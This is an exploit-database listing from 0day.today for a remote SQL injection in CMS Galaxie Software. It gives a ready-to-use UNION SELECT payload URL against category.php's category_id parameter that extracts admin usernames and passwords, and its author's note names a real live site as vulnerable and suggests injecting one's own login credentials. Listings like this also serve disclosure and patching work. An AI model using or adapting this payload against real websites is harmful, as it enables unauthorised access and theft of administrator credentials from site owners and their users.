[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

CMS Galaxie Software (category_id) Remote SQL Injection Vulnerability

Author
MurderSkillz
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2360
Category
web applications
Date add
13-12-2007
Platform
unsorted
=====================================================================
CMS Galaxie Software (category_id) Remote SQL Injection Vulnerability
=====================================================================



###############################################################################################
#         ___   ___                         _
#        / _ \ / _ \                       | |
#   __ _| | | | | | |_ __  ___   _ __   ___| |_
#  / _` | | | | | | | '_ \/ __| | '_ \ / _ \ __|
# | (_| | |_| | |_| | | | \__ \_| | | |  __/ |_
#  \__, |\___/ \___/|_| |_|___(_)_| |_|\___|\__|
#   __/ |
#  |___/
###############################################################################################
#Program Title ################################################################################
#CMS Galaxie Software  - Remote SQL Injection
#
#Note #######################################################################################
#Alright, bible.org is vuln to the sql injection.. but weird as it may seem the login doesnt work.. its a possiblility you can inject ur own username and password with sql injection, or maybe they are using another table name for the login page. good luck and give me shouts =)
# 
#Script Website ##############################################################################
#http://www.galaxie.com
#
######################################################################################
#
#Spl0it #########################################################################################
#http://vicsite.com/[pathtowebapp]/category.php?scid=1&category_id=-99%20union%20all%20select%20null,concat(username,0x20,0x3a,0x20,userpass),0%20from%20admin/*
#
#################################################################################################



#  0day.today [2024-12-25]  #